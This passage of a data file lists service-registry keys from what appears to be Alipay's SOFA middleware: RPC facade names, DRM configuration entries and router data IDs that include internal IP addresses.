product.ProductConfigFacade:1.0:PDCORE_SSCMW1CN@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.uemprod.common.service.facade.menu.MenuServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mdataprod.common.service.mds.MdsQueryClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rating.service.facade.charge.ChargeConsultXtsFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dpc.common.service.facade.UserNotifyConfigService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.mosn.MosnAppInvokeService:1.0:familycore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zpaas.zappinfo.facade.query.InfrastructureInfoQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbservindustryprod.common.service.facade.backend.TmallBizOrderModifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.acquirefront.service.facade.api.standard.AcquireStandardVerifyAndResumeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.custstk:name=com.alipay.custstk.cache.ha.drm.CZoneTairHARuleDrm.cifneardata.customerTairCache.realHAValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.gfas:name=com.alipay.gfas.core.config.drm.GfasDrmResource.tntInstIdList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.imtmsvcprod.common.service.facade.edu.CanteenServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfinvest.facade.api.investtrade.InvestSecurityOptionManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promokernel.common.service.facade.api.NotifyOrderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.yeb.YebAssetQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_FINFUNDMNG#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileiclib.common.service.facade.product.papers.PapersProductFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inspectcore.common.service.sdk.bizengine.query.ServerQueryEngine:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpromoscene.core.service.luckyfish.repo.FinsCampInstanceRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insopenprod.common.service.facade.api.reindeer.MobileScreenAppealFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.bic.common.service.facade.face.FaceAuthorizationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antlescenter.common.service.facade.api.SealService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openinsight.common.service.facade.rec.api.RecTaskQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundprod.common.service.facade.product.manage.FpInventoryManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:csmobile@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.extend-request:name=com.alipay.sla.businessgray.drm.BusinessGrayPolicy.globalGrayVersion,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.posgw.common.service.facade.ExpressBankSignInService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudinc:name=com.alipay.common.security.dresource.SecurityCommonDrm.ctokenCheckerDeny,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.securityidentify.service.ackcode.AckCodeSendService:1.0@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.common.facade.service.DataSourceCalcService:1.0:sesameCredit@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.supergw.service.facade.transaction.OutSyncTransCallBack:1.0:iopengw@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tairmanager.interfaces.endpoint.facade.rest.tbase.TBaseCommandFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.openapi.common.service.client.SysAppInvokeService:1.0:mobilecodec@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifemng.facade.bizrecon.DataRecoverFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ordermng:name=com.alipay.ordermng.common.util.drm.OrdermngDegradeDRM.oldRateExtendInfoProdSales,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.lowercaseFirst:name=com.alipay.sla.businessgray.drm.BusinessGrayGlobalSwitcher.bizTimeout,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.revtransTairCache.shardingRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.tradeexprod:name=com.alipay.common.security.dresource.SecurityCommonDrm.disableSchemeSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finfundbankbatch.service.facade.FinFundTaskMonitorFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.iliquidity.core.service.predictionmonitor.engine.PredictionModelEngine:1.0:commonRule@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.cpm.CapitalPlanManageConfigDrmImpl.darwinStrategyKey,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.sofabootrpcdemo.facade.SampleServiceTwo:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.opinioncore:name=com.alipay.opinioncore.common.drm.YqResourceDrm.consumeConcurrentlyMaxSpan,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","io.sofastack.cafe.workflowx.sofarpc.facade.WorkflowxRPCInvocationFacade:1.0:SERVERLESS_PLAN_MODULE_GROUP@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitydss.common.service.facade.indicator.domstrat.IndicatorDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.contentfactory.common.service.facade.content.GrabContentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloud.apfasmng.common.service.facade.jiuzhou.customchanges.CustomChangesFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fundselling.facade.query.TransactionQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mashup:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableVsar,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.consumecenter.common.service.platform.facade.BillBizAttrFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dchainprod.common.facade.query.FinancingChannelQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ternadmin.facade.types:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mwalletmng:name=com.alipay.mwalletmng.core.service.drm.SyncControlDRMResource.syncControlScenarioUserValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.36.3.12#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","cn.com.antcloud.acwareslifecore.common.service.facade.InstanceTagFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_100.83.217.104#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.capacitystudio.facade.CapacityDecisionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.trsbrain.common.service.facade.proto.BasicSelfCureService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:resultwrap#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:idpatrol@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbomp.common.service.facade.test.api.OnlyUseForTestFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbreservationprod.common.service.facade.commonreservation.ShopConfigManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.172.113#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.ipay.iliquidity.biz.manager.mng.ThresholdManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.meshyorg.common.service.facade.api.BizDomainFacade:1.0:orgBizDomainFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.findatacanal.common.service.manage.gildata.GdLcStibNotTextAnnounceSyncFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.afsc.common.service.punishcenter.service.schedule.ScheduleTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dwalm.core.service.fluidmng.warn.WarnProcessService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.imasp.common.service.facade.TripRightServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.arcore.common.service.facade.migrate.ArMigrateRzoneReceiveFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tradeapcore:name=com.alipay.echo.platform.client.drm.EchoPlaybackConfigDrm.playbackConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.charge:name=com.alipay.charge.common.dal.conf.impl.ChargeNewDRMConfigureImpl.serviceBillMsgResendSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.security.sandbox.streaming.facade.service.DatasetQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundprotocol.common.facade.service.FundDecisionServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.supergw.service.facade.transaction.OutSyncTransCallBack:1.0:iacquirecenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.common.service.facade.risk.FaultInjectFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.poscore:name=com.alipay.zcache.tbase.customerv2_dest.localCacheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.tr-service-enable:name=com.alipay.sla.businessgray.drm.BusinessGrayGlobalSwitcher.bizTimeout,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mservicesinspect.service.facade.service.EcoAuditDetectConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.zoloz.zcif.facade.service.AnonymousnessSyncService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tr-service-enable:name=com.alipay.routeclient.DefaultRouteCoordinator.elasticRuleVersion,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","cn.com.antcloud.acmcscore.facade.ClientVersionFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mrchprod.common.service.facade.operation.OpRecordFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:dpdataprocess@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.wishTairCache.nativeRuleZones,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.contentlib.common.service.facade.content.NewsFlashQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zappinfo:name=com.alipay.common.security.dresource.SecurityCommonDrm.customJsonSuffixEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.custdecision.service.facade.DataDictionaryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:globalremitprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.necquery.common.service.account.CustAcctQueryNewFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:planetcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.findecision:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.disableSync,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:quotnearsource@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.common.facade.service.FeatureCalcService:1.0:publicDomain_agdscsalipay@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfmac.common.service.planning.facade.api.BPQueryServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zqueue.client.qaZQueue19#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finstore.common.service.facade.fop.mng.FinServiceCardConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfmac.common.service.budget.facade.BizApplyLogFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:arks-control@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bugscan.service.BugScanOperatorFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.promocenter:name=com.alipay.promocenter.common.drm.PromocenterBussinessParamsDrmResource.smidCheckParallelNum,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA_PRC_TRANSMIT_DATACAPTAIN#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insproductcore.facade.service.InsFcProductQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insbffweb:name=com.alipay.routeclient.DefaultRouteCoordinator.stressSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.mwalletmng:name=com.alipay.mwalletmng.biz.luckymoney.drm.LuckMoneyDRMResource.dingTalkConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finquotationcenter.common.service.facade.api.MarketFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ecocheck.biz.parkingfee.ParkingFeeIndustryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_C_VOUCHER_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.cif.facade.AsyncCompensationService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.182.121#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.alphasec.compass.operating.facade.service.MigrateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_30.73.180.117#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.processmng:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.successParkIntervalMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.cifin:name=com.alipay.cifin.bankcard.core.service.resource.drm.UsageCardEventDrmResource.productCodeWhiteListStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finpromobus.common.service.facade.thirdparty.YuemaSyncConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_ANTWATCH#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.opinioncore:name=com.alipay.cif.drm.PasswordRevokeSwitch.paymentPasswordRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","cn.com.antcloud.acoffercenter.common.service.facade.metadata.CommonBuyManageFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","SOFA-SCHEDULER-S-PCACTIVITYCORE-TASK#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:pcinstmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.miniselfop.facade.api.selfopact.SelfOpActUserTriggerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilecashier.service.facade.spi.CashierActivityCallbackFacade:1.0:ebppprod_result_callback@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.overseamng.rate.pms.PmsRateGradeServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.opinioncore:name=com.alipay.cif.drm.PasswordRevokeSwitch.gesturePasswordRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.secuinfos.common.service.facade.article.SpecialFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.airbops.service.common.proxy.cif.facade.ProxyFundCardInfoQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","bkopenplatform.facade.UnifygwServiceClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_M_MABP#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:iprofile_ProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.137.89#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.opencore.service.facade.acl.AclResourceQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.aistudio.facade.AiStudioD2DeployService:1.0:internal@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dataphin.schedule.operation.platform.facade.monitor.ScheduleMonitorApi:1.0:dpoperationplatform@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditschedule.service.facade.spi.ExecuteService:1.0:11@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.baymax.maintainess.drm.scheduleParameter.app_finfocore.taskDeferredSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.cloudlego:name=com.alipay.common.security.dresource.SecurityCommonDrm.customJsonSuffixEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.custcenter.service.antg.facade.accesstoken.AgMerchantManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ismonitor.common.service.facade.censor.CensorAlertFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opensupport.common.service.facade.partner.PartnerDataworkQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mwalletmng.nest.NestTemplateServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zbdm.common.service.facade.meta.BdmPhyTableFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mdeduct.common.service.facade.ProtocolPropertyService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openitemcore.common.service.facade.api.audit.AuditProcessQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.IsvAppManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dataphin.ide.common.facade.quota.spi.ResourceQuotaSpi:1.0:dpdataprocess@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.afsc.common.service.thor.service.ThorDsMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.revtrans:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.disableSync,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.124.181.148#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.ucdpmng.facade.UcdpDeliverGroupMngFacade:1.0@tri#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mmembercenter.common.service.facade.member.api.MemberRelationQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openeval.core.service.utils.dayu.DayuApiClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.chargefront:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.ioErrorIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.etetestcore.service.api.mfinpromo.MfinpromoEquityControlService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.koubei.kbleadscenter.common.service.facade.label.LabelQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zcache:name=com.alipay.zcache.tbase.zdatabusPayInfoTairCache.localCacheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.discount.core.model.repository.CampRelateSubjectRepository:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promoevent.common.service.facade.MsgConfigService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrmcore.common.service.facade.service.project.ProjectUserService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.service.drm.FixedDataSyncWhiteIdDrm.skipSyncStatusCheck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mservicesinspect.common.service.integration.codescan.CodeScanClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.manager.SystemTaskManager:1.0:antzhixin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileha.core.service.exceptionana.ClientPerfDistributionService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.omocore.common.outbound.facade.PhoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.imerchopmng.merchant.common.service.facade.api.CrmLabelConfigManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinbaseprod.common.service.facade.spi.service.SearchCompleteSpiService:1.0:insptmarket@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.charge.service.facade.ChargeInitAdjustRateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mrchasset.common.service.facade.mall.AssetMallItemFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfoprod.common.service.facade.FinfoServiceAppManageService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:yebbffweb@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.settlequery.common.service.facade.config.api.DepositBackMapQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientSyncServiceFacade:1.0:bkdevops@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.45.71.197#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_192.168.1.11#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.ipay.icertifycore.service.facade.api.CertService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antcloud.component.endpoint.sofarest.SystemParametersRestService#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","config:com.alipay.seekers.facade.apis.SpiConfigSchemaFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","config:com.alipay.pfunddts.common.facade.api.BalanceUpdateQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.messagefusion.facade.api.TemplateUpdateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.clive.common.service.facade.api.CliveServiceContext:1.0.0:clive@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.fundprod.facade.FundTransferFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilerelation.common.service.facade.SocialProfileFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchasset.common.service.facade.purchases.AssetPurchasesProductInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:mrchportalcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tr-service-enable:name=com.alipay.routeclient.DefaultRouteCoordinator.whiteListRPCLoadTest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.afsc.common.service.assistinvestigate.require.facade.AddressAndUndertakerManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ebppgw.facade.mng.AssembleTemplateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.159.59#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.publichome.biz.service.impl.rpc.MobileLifePlatformFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.spcenter.facade.bd.BdFeatureManagerFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.forexprod.common.service.facade.ForexBillCallBackWService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:dataflow@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.miniprod.common.service.facade.api.antcloud.MiniAppAntCloudQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.adcenter.common.service.facade.drill.service.AdcFaultInjectFacade:1.0:adcfaultcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securityprodmng.common.service.facade.QueryCtuEventInfoService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.accordercore.common.service.facade.control.auth.api.ExchangeServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:fuelprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zqueue.client.qaZQueue37#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.cashiercore.service.facade.spi.CashierCoreBizCallbackService:1.0:transfercenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:dwalm@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mdeduct.biz.agreement.internal.operation.IRemoteAgreementOperator:1.0:remoteUsageAgreementUnsignOperator@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchservbase.biz.service.mrchooda.facade.DecisionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileacauth.service.device.facade.IotDeviceBizTypeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.paymentmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.uriCheckPayloads,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.160.177.78#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mfinsnsprod.biz.service.gw.community.api.feed.FeedGwManagerV3:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.insmobile.drm.insureddrmhandler.continuousSignAgreementProducts,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOF